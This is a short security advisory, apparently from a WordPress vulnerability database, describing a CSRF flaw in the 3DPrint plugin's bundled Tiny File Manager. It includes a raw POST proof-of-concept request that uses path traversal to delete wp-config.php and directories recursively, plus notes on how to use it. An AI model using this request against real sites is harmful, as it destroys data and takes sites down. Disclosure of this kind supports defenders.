3DPrint <= 3.5.4.7 - Arbitrary File and Directory Deletion via CSRF

The plugin does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form.

PoC

== RAW POST Request== POST /wp-content/plugins/3dprint/includes/ext/tinyfilemanager/tinyfilemanager.php HTTP/1.1 Host: example.com Cookie: [admin+] Content-Type: application/x-www-form-urlencoded Content-Length: 71 group=1&delete;=1&file;%5b0%5d=…/2022&file;%5b1%5d=…/…/…/wp-config.php == HTML form == == Notes == The value of ‘group’ and ‘delete’ can be anything, they are never used. The file path of the files and dirs to delete is relative to the plugin upload root, ‘wp-content/uploads/p3d’. Directories are deleted recursively.